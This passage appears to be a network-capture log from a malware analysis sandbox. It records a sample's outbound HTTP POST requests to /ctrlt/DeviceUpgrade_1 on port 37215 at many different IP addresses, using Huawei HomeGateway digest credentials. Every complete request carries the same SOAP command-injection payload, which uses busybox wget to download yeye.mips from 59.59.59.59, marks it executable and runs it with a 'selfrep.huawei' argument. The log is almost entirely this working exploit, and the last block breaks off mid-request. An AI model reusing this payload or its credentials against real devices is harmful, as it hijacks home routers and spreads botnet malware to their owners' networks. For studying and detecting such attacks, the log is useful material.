                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2321192.168.2.1553416157.165.155.19937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.348961115 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2322192.168.2.1557164106.108.217.6937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.349091053 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2323192.168.2.154848841.187.201.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.349174976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2324192.168.2.1543740157.0.243.1737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.349232912 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2325192.168.2.1551446157.137.132.16337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.349304914 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2326192.168.2.154944241.146.154.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.358418941 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2327192.168.2.1543826157.204.76.10737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.358591080 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2328192.168.2.154075841.140.202.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.358912945 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2329192.168.2.1539014157.46.10.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.358948946 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          2330192.168.2.155736441.3.28.20437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:29.363775969 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 